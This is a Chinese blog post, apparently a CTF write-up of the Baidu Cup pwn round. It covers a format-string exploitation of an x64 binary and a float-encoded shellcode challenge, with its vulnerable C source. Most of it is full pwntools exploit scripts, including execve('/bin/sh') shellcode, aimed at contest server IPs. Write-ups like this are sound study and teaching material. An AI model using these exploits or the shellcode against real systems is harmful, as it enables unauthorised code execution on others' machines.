<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="utf-8">
  
  <title>Baiudu杯 pwn专场记录 | o0xmuhe&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="前言十一月的第一周，百度杯的pwn专场，就去学习了下姿势，更加认识到自己的不足和问题所在，以后努力更正改进~本次比赛一共是3个misc和三个pwn，题目都不难，pwn好像有两个都是原题，但是我只google到了第二个题目…">
<meta name="keywords" content="CTF Writeup,pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="Baiudu杯 pwn专场记录">
<meta property="og:url" content="http:&#x2F;&#x2F;o0xmuhe.me&#x2F;2016&#x2F;11&#x2F;07&#x2F;Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95&#x2F;index.html">
<meta property="og:site_name" content="o0xmuhe&#39;s blog">
<meta property="og:description" content="前言十一月的第一周，百度杯的pwn专场，就去学习了下姿势，更加认识到自己的不足和问题所在，以后努力更正改进~本次比赛一共是3个misc和三个pwn，题目都不难，pwn好像有两个都是原题，但是我只google到了第二个题目…">
<meta property="og:locale" content="default">
<meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;baidu-pwn&#x2F;vuln.png">
<meta property="og:updated_time" content="2016-11-07T09:43:07.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;baidu-pwn&#x2F;vuln.png">
  
    <link rel="alternate" href="/atom.xml" title="o0xmuhe&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      // Theme runtime flags read by the yilia theme scripts; this page is a
      // single post, so only the isPost flag is set.
      var yiliaConfig = {};
      yiliaConfig.rootUrl = '/';
      yiliaConfig.fancybox = true;   // enable fancybox image pop-ups
      yiliaConfig.animate = true;    // enable animate.css transitions
      yiliaConfig.isHome = false;
      yiliaConfig.isPost = true;
      yiliaConfig.isArchive = false;
      yiliaConfig.isTag = false;
      yiliaConfig.isCategory = false;
      yiliaConfig.open_in_new = false;
  </script>
</head>
<body>
  <div id="container">
    <div class="mid-col">
      <div class="body-wrap"><article id="post-Baiudu杯-pwn专场记录" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/" class="article-date">
      <time datetime="2016-11-07T09:07:19.000Z" itemprop="datePublished">2016-11-07</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Baiudu杯 pwn专场记录
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF-Writeup/" rel="tag">CTF Writeup</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>十一月的第一周，百度杯的pwn专场，就去学习了下姿势，更加认识到自己的不足和问题所在，以后努力更正改进~<br>本次比赛一共是3个misc和三个pwn，题目都不难，pwn好像有两个都是原题，但是我只google到了第二个题目…</p>
<a id="more"></a>

<h4 id="1-pwnme"><a href="#1-pwnme" class="headerlink" title="1.pwnme"></a>1.pwnme</h4><pre><code>格式化字符串(x64)</code></pre><p>其实后面还有个bof，fmt和bof的结合可能才是出题人的本意吧(我猜的)。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ checksec pwnme </span><br><span class="line">[!] Couldn&apos;t find relocations against PLT to get symbols</span><br><span class="line">[*] &apos;/home/muhe/Desktop/baidu-pwn1/pwnme&apos;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE</span><br></pre></td></tr></table></figure>
<ul>
<li>格式化字符串<br><img src="http://blogimg-10065924.cos.myqcloud.com/baidu-pwn/vuln.png" alt="格式化字符串"><br>在输出<code>name</code>和<code>pass</code>的时候会触发这个格式化字符串漏洞，可以任意地址读写。</li>
</ul>
<p>但是需要注意</p>
<ul>
<li>x64中fmt 泄露的参数的顺序(<code>RDI-RDX-RCX-R8-R9-stack[0]-stack[1]......</code>)</li>
<li>因为有00截断，所以要格式化的地址放后面( -。- 没错 后入式)</li>
</ul>
<p>本来以为开了 Full RELRO 的情况下 DynELF就不行了，还想着手动去解析出libc基地址然后再搞呢…改了下方式就可以了。<br>在师傅的指导下完成了leak的部分，然后使用DynELF去泄露system的地址，再把返回地址改为system，设置好参数后ret过去。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*-coding:utf-8-*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># based on joker 's exploit</span></span><br><span class="line">r = remote(<span class="string">"106.75.84.74"</span>, <span class="number">10001</span>)<span class="comment">#pwn</span></span><br><span class="line"><span class="comment">#r = remote("127.0.0.1", 10001)#pwn</span></span><br><span class="line"><span 
class="comment">#context.log_level = "debug"</span></span><br><span class="line"></span><br><span class="line">read_got = <span class="number">0x0000000000601FC8</span></span><br><span class="line">pop_rdi_ret = <span class="number">0x0000000000400ed3</span></span><br><span class="line">pppr = <span class="number">0x000000000400ECE</span></span><br><span class="line"><span class="comment">#ret addr 0x0000000000400e56</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span><span class="params">(addr)</span>:</span></span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"2"</span>)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"aaaa"</span></span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"%12$s"</span>+<span class="string">"AAAAAAA"</span> + p64(addr)</span><br><span class="line">    r.send(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"1"</span>)</span><br><span class="line">    content = r.recvuntil(<span class="string">"AAAAAAA"</span>)</span><br><span class="line">    <span class="keyword">if</span>(len(content) == <span class="number">12</span>):</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"[*] NULL "</span></span><br><span class="line">        <span class="keyword">return</span> <span class="string">'\x00'</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">print</span> <span 
class="string">"[*]%#x -- &gt; %s"</span> % (addr,(content[<span class="number">5</span>:<span class="number">-7</span>] <span class="keyword">or</span> <span class="string">''</span>).encode(<span class="string">'hex'</span>))</span><br><span class="line">        <span class="keyword">return</span> content[<span class="number">5</span>:<span class="number">-7</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#writebyte</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">writebyte</span><span class="params">(count_byte,addr)</span>:</span></span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"2"</span>)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"aaaa"</span></span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"%&#123;0&#125;c%12$hhn"</span>.format(count_byte)</span><br><span class="line">    payload += <span class="string">"A"</span>*(<span class="number">12</span>-len(payload)) + p64(addr)</span><br><span class="line">    r.send(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"1"</span>)</span><br><span class="line">    r.recvuntil(<span class="string">"\n"</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">"40):"</span>)</span><br><span class="line">r.sendline(<span class="string">"aaa"</span>)</span><br><span class="line">r.recvuntil(<span class="string">"40):"</span>)</span><br><span class="line">r.sendline(<span class="string">"aaa"</span>)</span><br><span 
class="line"></span><br><span class="line">d = DynELF(leak,elf=ELF(<span class="string">'./pwnme'</span>))</span><br><span class="line">system_addr = d.lookup(<span class="string">'system'</span>,<span class="string">'libc'</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"[*] system addr:&#123;0&#125;"</span>.format(hex(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#leak ret_addr</span></span><br><span class="line">r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">"2"</span>)</span><br><span class="line">r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"aaaa"</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"%6$s"</span> <span class="comment">#stack</span></span><br><span class="line">r.send(payload)</span><br><span class="line">r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">"1"</span>)</span><br><span class="line">r.recvuntil(<span class="string">"\n"</span>)</span><br><span class="line">content = r.recv(<span class="number">6</span>)</span><br><span class="line">content = content.ljust(<span class="number">8</span>,<span class="string">"\x00"</span>)</span><br><span class="line">stack_addr = u64(content)  <span class="comment"># 0x7ffc23fb85e0</span></span><br><span class="line">stack_while_ret_addr = stack_addr + <span class="number">8</span> - <span class="number">0xb0</span> <span class="comment">#</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"[*] stack_while_ret addr:&#123;0&#125;"</span>.format(hex(stack_while_ret_addr))</span><br><span class="line"><span 
class="comment">#leak_ret_addr</span></span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0000| 0x7ffc23fb84f0 --&gt; 0x7ffc23fb8530 --&gt; 0x7ffc23fb85e0 --&gt; 0x400e70 (push   r15)</span></span><br><span class="line"><span class="string">0008| 0x7ffc23fb84f8 --&gt; 0x400d32 (add    rsp,0x30)</span></span><br><span class="line"><span class="string">0016| 0x7ffc23fb8500 --&gt; 0xa61616161 ('aaaa\n')</span></span><br><span class="line"><span class="string">0024| 0x7ffc23fb8508 --&gt; 0x0 </span></span><br><span class="line"><span class="string">0032| 0x7ffc23fb8510 --&gt; 0x7324362500000000 ('')</span></span><br><span class="line"><span class="string">0040| 0x7ffc23fb8518 --&gt; 0x0 </span></span><br><span class="line"><span class="string">0048| 0x7ffc23fb8520 --&gt; 0x0 </span></span><br><span class="line"><span class="string">0056| 0x7ffc23fb8528 --&gt; 0x400d0b (cmp    eax,0x2)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">writebyte(<span class="number">0xce</span>,stack_while_ret_addr)</span><br><span class="line">writebyte(system_addr &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">1</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">2</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">3</span>)</span><br><span 
class="line">writebyte((system_addr &gt;&gt; <span class="number">32</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">4</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">40</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">"2"</span>)</span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"/bin/sh;"</span> + <span class="string">"AAAAAAAABBB"</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"\x00\x00\x00\x00"</span> + p64(pop_rdi_ret) + p64(stack_while_ret_addr + <span class="number">8</span>)</span><br><span class="line"><span class="comment">#raw_input('$ret')</span></span><br><span class="line">r.send(payload)</span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">'3'</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h4 id="2-loading"><a href="#2-loading" class="headerlink" title="2.loading"></a>2.loading</h4><pre><code>简单粗暴把输入的每个字节 /2333.0 然后直接执行</code></pre><p>浮点数的考察啊…google了下 <code>float shellcode</code>，就找到了原题啊…把别人exp里的1337.0改成2333.0就好了…<br>搜到了<a href="https://j31d0.github.io/writeup/2016/04/18/pctf2016-fixedpoint/" target="_blank" rel="noopener">pctf 2016 fixedpoint writeup</a><br>还有这个 <a href="https://kimiyuki.net/blog/2016/04/18/plaidctf-2016-fixedpoint/" target="_blank" rel="noopener">PlaidCTF 2016 fixedpoint</a></p>
<p>pctf 这个的源码，简直不要再一样好么。根因也就一目了然：<code>mmap</code> 的 prot 参数直接写成 7（读、写、执行全开），用户通过 <code>scanf("%d")</code> 输入的值除以常数后逐个填进这块内存，最后整块内存被当成函数指针调用——数据区可执行、用户数据被当代码跑，两条都踩了。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span>** argv)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">float</span>* <span class="built_in">array</span> = mmap(<span class="number">0</span>, <span class="keyword">sizeof</span>(<span class="keyword">float</span>)*<span class="number">8192</span>, <span class="number">7</span>, MAP_PRIVATE|MAP_ANONYMOUS, <span class="number">-1</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">int</span> i;</span><br><span class="line">  <span class="keyword">int</span> temp;</span><br><span class="line">  <span class="keyword">float</span> ftemp;</span><br><span class="line"></span><br><span 
class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">8192</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">scanf</span>(<span class="string">"%d"</span>, &amp;temp)) <span class="keyword">break</span>;</span><br><span class="line">    <span class="built_in">array</span>[i] = ((<span class="keyword">float</span>)temp)/<span class="number">1337.0</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">write</span>(<span class="number">1</span>, <span class="string">"here we go\n"</span>, <span class="number">11</span>);</span><br><span class="line">  (*(<span class="keyword">void</span>(*)())<span class="built_in">array</span>)();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p>附上exploit</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">shellcode 
= [<span class="string">"\x31\xc9"</span>, <span class="comment"># xor ecx, ecx</span></span><br><span class="line">             <span class="string">"\xf7\xe1"</span>, <span class="comment"># mul ecx</span></span><br><span class="line">             <span class="string">"\x51"</span>, <span class="comment"># push ecx</span></span><br><span class="line">             <span class="string">"\xb1\xff"</span>, <span class="comment"># mov cl, 0xFF</span></span><br><span class="line">             <span class="string">"\xb5\xff"</span>, <span class="comment"># mov ch, 0xFF</span></span><br><span class="line">             <span class="string">"\x41"</span>, <span class="comment"># inc ecx</span></span><br><span class="line">             <span class="string">"\xb4\x68"</span>, <span class="comment"># mov ah, 0x68</span></span><br><span class="line">             <span class="string">"\xb0\x73"</span>, <span class="comment"># mov al, 0x73</span></span><br><span class="line">             <span class="string">"\xf7\xe1"</span>, <span class="comment"># mul ecx</span></span><br><span class="line">             <span class="string">"\xb4\x2f"</span>, <span class="comment"># mov ah, 0x2F</span></span><br><span class="line">             <span class="string">"\xb0\x2f"</span>, <span class="comment"># mov al, 0x2F</span></span><br><span class="line">             <span class="string">"\x50"</span>, <span class="comment"># push eax</span></span><br><span class="line">             <span class="string">"\xb4\x6e"</span>, <span class="comment"># mov ah, 0x6e</span></span><br><span class="line">             <span class="string">"\xb0\x69"</span>, <span class="comment"># mov al, 0x69</span></span><br><span class="line">             <span class="string">"\xf7\xe1"</span>, <span class="comment"># mul ecx</span></span><br><span class="line">             <span class="string">"\xb4\x62"</span>, <span class="comment"># mov ah, 0x62</span></span><br><span class="line">             <span 
class="string">"\xb0\x2f"</span>, <span class="comment"># mov al, 0x2F</span></span><br><span class="line">             <span class="string">"\x50"</span>, <span class="comment"># push eax</span></span><br><span class="line">             <span class="string">"\x31\xc0"</span>, <span class="comment"># xor eax, eax</span></span><br><span class="line">             <span class="string">"\x31\xd2"</span>, <span class="comment"># xor edx, edx</span></span><br><span class="line">             <span class="string">"\x31\xc9"</span>, <span class="comment"># xor ecx, ecx</span></span><br><span class="line">             <span class="string">"\x89\xe3"</span>, <span class="comment"># mov ebx, esp</span></span><br><span class="line">             <span class="string">"\xb0\x0b"</span>, <span class="comment"># mov al, 11</span></span><br><span class="line">             <span class="string">"\xcd\x80"</span>] <span class="comment"># int 0x80</span></span><br><span class="line"></span><br><span class="line">ints_to_send = []</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> instr <span class="keyword">in</span> shellcode:</span><br><span class="line">    z = <span class="string">"\x40"</span></span><br><span class="line">    <span class="keyword">if</span> len(instr) == <span class="number">1</span>:</span><br><span class="line">        z = <span class="string">"\x90\x40"</span></span><br><span class="line">    payload = <span class="string">"\x48"</span> + instr[::<span class="number">-1</span>] + z</span><br><span class="line">    a = struct.unpack(<span class="string">"&gt;f"</span>, payload)[<span class="number">0</span>]*<span class="number">2333</span></span><br><span class="line">    <span class="keyword">if</span> a &gt; <span class="number">2147483647</span>:</span><br><span class="line">        log.error(<span class="string">"It's too large fam."</span>)</span><br><span class="line"></span><br><span class="line">    b = str(<span 
class="string">"&#123;0:f&#125;"</span>.format(a)).split(<span class="string">"."</span>)[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">    log.info(b + <span class="string">" "</span> + payload.encode(<span class="string">"hex"</span>))</span><br><span class="line">    ints_to_send.append(b)</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">"106.75.84.68"</span>, <span class="number">20000</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> ints_to_send:</span><br><span class="line">    r.sendline(i)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h4 id="感言"><a href="#感言" class="headerlink" title="感言"></a>感言</h4><p>这个比赛让我感觉收获最大的应该是“思考”:<code>要学会自己思考，不然做再多题目都没有用。</code></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/">Baiudu杯 pwn专场记录</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 muhe 的个人博客">muhe</a></p>
        <p><span>发布时间:</span>2016年11月07日 - 17时07分</p>
        <p><span>最后更新:</span>2016年11月07日 - 17时43分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/" title="Baiudu杯 pwn专场记录">http://o0xmuhe.me/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/</a>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>




  
</article>










    
    



</div>

    </div>
    <!-- NOTE(review): second load of the exact jQuery/RequireJS bundle that is already included earlier on this page. Loading jQuery twice presumably re-creates window.jQuery/$ and discards any plugin registered on the first instance, and this copy likewise has no integrity/crossorigin attributes for SRI. Keep only one include. -->
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
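        $(document).ready(function() {
            // Pick one of the theme's numbered background images at random and
            // apply it to the mobile nav and the left column.
            var backgroundnum = 24;
            // floor()+1 maps Math.random() in [0, 1) onto exactly 1..backgroundnum.
            // The previous Math.ceil(Math.random() * backgroundnum) could produce 0
            // when random() returns 0 and then request bg-0.jpg, which presumably
            // does not exist (the theme ships bg-1 .. bg-24).
            var index = Math.floor(Math.random() * backgroundnum) + 1;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, index);
            var style = {"background-image": backgroundimg, "background-size": "cover", "background-position": "center"};
            $("#mobile-nav").css(style);
            $(".left-col").css(style);
        })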
    </script>





<script>
    $(document).ready(function() {
        // Pages without a comments section get the "jump to comments" arrow
        // (second link in the #scroll widget) hidden.
        var hasComments = $("#comments").length > 0;
        if (!hasComments) {
            $("#scroll > a:nth-child(2)").hide();
        }
    })
</script>


  <script language="javascript">
    $(function() {
        // Custom tooltip: for every link with a title attribute, move the title
        // into jQuery data (suppressing the browser's native tooltip) and show a
        // positioned #anchortitlecontainer div while the link is hovered.
        function showTip(link, text) {
            var pos = link.offset();
            var tip = $("<div id=\"anchortitlecontainer\"></div>");
            tip.appendTo($("body"));
            // NOTE(review): the title text is injected via .html(), i.e. an
            // innerHTML sink. A title attribute is plain text by contract, so
            // .text() would render the same and close the markup-injection path;
            // left unchanged here in case some theme titles rely on inline markup.
            tip.html(text);
            tip.css({
                top: pos.top - link.outerHeight() - 15,
                left: pos.left + link.outerWidth() / 2 + 1
            });
            tip.fadeIn(function() {
                var pop = $(this);
                // Auto-dismiss after 800 ms per character of tooltip text.
                setTimeout(function() {
                    pop.remove();
                }, pop.text().length * 800);
            });
        }

        function hideTip() {
            $("#anchortitlecontainer").remove();
        }

        $("a[title]").each(function() {
            var link = $(this);
            var text = link.attr('title');
            if (text == undefined || text == "") {
                return;
            }
            link.data('title', text);
            link.removeAttr('title');
            link.hover(function() { showTip(link, text); }, hideTip);
        });
    });
</script>


  </div>
</body>
</html>